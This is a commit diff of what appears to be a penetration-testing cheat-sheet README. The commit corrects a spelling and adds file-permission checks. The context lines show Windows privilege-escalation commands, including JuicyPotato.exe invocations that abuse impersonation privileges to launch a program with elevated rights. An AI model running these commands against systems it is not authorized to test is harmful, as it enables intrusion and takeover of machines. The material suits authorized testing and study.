Update README.md
This commit is contained in:
@@ -1029,11 +1029,15 @@ net user {USERNAME}
|
|||||||
# Check UAC level
|
# Check UAC level
|
||||||
whoami /groups
|
whoami /groups
|
||||||
|
|
||||||
# Check Privledges for Impersonation
|
# Check Privileges for Impersonation
|
||||||
whoami /priv
|
whoami /priv
|
||||||
JuicyPotato.exe -t * -p {run.exe} -l 8003
|
JuicyPotato.exe -t * -p {run.exe} -l 8003
|
||||||
JuicyPotato.exe -t * -p {run.exe} -l 8003 -c {CLSID}
|
JuicyPotato.exe -t * -p {run.exe} -l 8003 -c {CLSID}
|
||||||
|
|
||||||
|
# Check File Permissions
|
||||||
|
Get-ACL {FILE or DIR} | fl
|
||||||
|
icacls {FILE}
|
||||||
|
|
||||||
# Powershell
|
# Powershell
|
||||||
cmd /c "JuicyPotato.exe -t * -p run.exe -l 8003 -c {CLSID}"
|
cmd /c "JuicyPotato.exe -t * -p run.exe -l 8003 -c {CLSID}"
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user